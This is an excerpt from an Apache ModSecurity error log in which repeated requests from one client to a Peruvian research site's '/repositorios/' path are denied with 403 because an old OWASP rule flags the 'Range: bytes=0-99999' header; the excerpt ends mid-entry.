[pid 11230:tid 140634115458816] [client 190.102.150.245:36692] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc5wAAANQ"] [Mon Feb 17 10:36:32.241553 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36694] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc6AAAAMA"] [Mon Feb 17 10:36:32.339281 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36696] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc6QAAAME"] [Mon Feb 17 10:36:32.437078 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36698] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc6gAAANE"] [Mon Feb 17 10:36:32.534009 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36700] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc6wAAAM8"] [Mon Feb 17 10:36:32.631282 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36702] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgKvoDupyaoF2tAuc7AAAANc"] [Mon Feb 17 10:36:32.728335 2025] [:error] [pid 10662:tid 140634266527488] [client 190.102.150.245:36704] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgP_97XY8xax64gWTnwAAAAI"] [Mon Feb 17 10:36:32.827732 2025] [:error] [pid 10662:tid 140634249742080] [client 190.102.150.245:36706] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgP_97XY8xax64gWToAAAAAQ"] [Mon Feb 17 10:36:32.925658 2025] [:error] [pid 10662:tid 140634157422336] [client 190.102.150.245:36708] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgP_97XY8xax64gWToQAAAA8"] [Mon Feb 17 10:36:33.023989 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36710] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgavoDupyaoF2tAuc7QAAAMU"] [Mon Feb 17 10:36:33.132158 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:36712] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgavoDupyaoF2tAuc7gAAAMo"] [Mon Feb 17 10:36:33.230210 2025] [:error] [pid 10664:tid 140634182600448] [client 190.102.150.245:36714] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgQJrayd7JfpBdXs8BAAAAIw"] [Mon Feb 17 10:36:33.328207 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:36716] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgavoDupyaoF2tAuc7wAAAMw"] [Mon Feb 17 10:36:33.425071 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36718] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgavoDupyaoF2tAuc8AAAANU"] [Mon Feb 17 10:36:33.519778 2025] [:error] [pid 10662:tid 140634216171264] [client 190.102.150.245:36720] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgf_97XY8xax64gWTogAAAAg"] [Mon Feb 17 10:36:33.618033 2025] [:error] [pid 10663:tid 140634249742080] [client 190.102.150.245:36722] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgbUcx1xj5z0EGUpRmgAAAEQ"] [Mon Feb 17 10:36:33.714802 2025] [:error] [pid 10663:tid 140634199385856] [client 190.102.150.245:36724] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgbUcx1xj5z0EGUpRmwAAAEo"] [Mon Feb 17 10:36:33.811759 2025] [:error] [pid 10663:tid 140634182600448] [client 190.102.150.245:36726] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgbUcx1xj5z0EGUpRnAAAAEw"] [Mon Feb 17 10:36:33.909962 2025] [:error] [pid 10663:tid 140634149029632] [client 190.102.150.245:36728] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgbUcx1xj5z0EGUpRnQAAAFA"] [Mon Feb 17 10:36:34.009292 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36734] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgqvoDupyaoF2tAuc8QAAAMs"] [Mon Feb 17 10:36:34.108997 2025] [:error] [pid 10663:tid 140634140636928] [client 190.102.150.245:36736] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgrUcx1xj5z0EGUpRngAAAFE"] [Mon Feb 17 10:36:34.206155 2025] [:error] [pid 10663:tid 140634157422336] [client 190.102.150.245:36738] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgrUcx1xj5z0EGUpRnwAAAE8"] [Mon Feb 17 10:36:34.303722 2025] [:error] [pid 10662:tid 140634241349376] [client 190.102.150.245:36740] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgv_97XY8xax64gWTowAAAAU"] [Mon Feb 17 10:36:34.400879 2025] [:error] [pid 10664:tid 140634174207744] [client 190.102.150.245:36742] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXggJrayd7JfpBdXs8BQAAAI0"] [Mon Feb 17 10:36:34.507158 2025] [:error] [pid 10663:tid 140634132244224] [client 190.102.150.245:36744] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgrUcx1xj5z0EGUpRoAAAAFI"] [Mon Feb 17 10:36:34.605268 2025] [:error] [pid 10662:tid 140634115458816] [client 190.102.150.245:36746] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgv_97XY8xax64gWTpAAAABQ"] [Mon Feb 17 10:36:34.703437 2025] [:error] [pid 10663:tid 140634098673408] [client 190.102.150.245:36748] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgrUcx1xj5z0EGUpRoQAAAFY"] [Mon Feb 17 10:36:34.801195 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36750] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgqvoDupyaoF2tAuc8gAAAMQ"] [Mon Feb 17 10:36:34.905180 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36752] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgqvoDupyaoF2tAuc8wAAANM"] [Mon Feb 17 10:36:35.003485 2025] [:error] [pid 10664:tid 140634140636928] [client 190.102.150.245:36754] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgwJrayd7JfpBdXs8BgAAAJE"] [Mon Feb 17 10:36:35.103047 2025] [:error] [pid 10662:tid 140634165815040] [client 190.102.150.245:36756] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg__97XY8xax64gWTpQAAAA4"] [Mon Feb 17 10:36:35.200700 2025] [:error] [pid 10663:tid 140634081888000] [client 190.102.150.245:36758] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg7Ucx1xj5z0EGUpRogAAAFg"] [Mon Feb 17 10:36:35.298648 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36760] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg6voDupyaoF2tAuc9AAAAMM"] [Mon Feb 17 10:36:35.397147 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36762] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg6voDupyaoF2tAuc9QAAANQ"] [Mon Feb 17 10:36:35.494803 2025] [:error] [pid 10663:tid 140634107066112] [client 190.102.150.245:36764] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg7Ucx1xj5z0EGUpRowAAAFU"] [Mon Feb 17 10:36:35.593150 2025] [:error] [pid 10662:tid 140634224563968] [client 190.102.150.245:36768] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg__97XY8xax64gWTpgAAAAc"] [Mon Feb 17 10:36:35.691276 2025] [:error] [pid 10662:tid 140634149029632] [client 190.102.150.245:36770] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg__97XY8xax64gWTpwAAABA"] [Mon Feb 17 10:36:35.788748 2025] [:error] [pid 10663:tid 140634266527488] [client 190.102.150.245:36772] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg7Ucx1xj5z0EGUpRpAAAAEI"] [Mon Feb 17 10:36:35.886113 2025] [:error] [pid 10663:tid 140634258134784] [client 190.102.150.245:36774] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg7Ucx1xj5z0EGUpRpQAAAEM"] [Mon Feb 17 10:36:35.983749 2025] [:error] [pid 10663:tid 140634274920192] [client 190.102.150.245:36776] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXg7Ucx1xj5z0EGUpRpgAAAEE"] [Mon Feb 17 10:36:36.080928 2025] [:error] [pid 10663:tid 140634207778560] [client 190.102.150.245:36778] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRpwAAAEk"] [Mon Feb 17 10:36:36.178898 2025] [:error] [pid 10663:tid 140634249742080] [client 190.102.150.245:36780] [client 190.102.150.245] ModSecurity: Access denied with 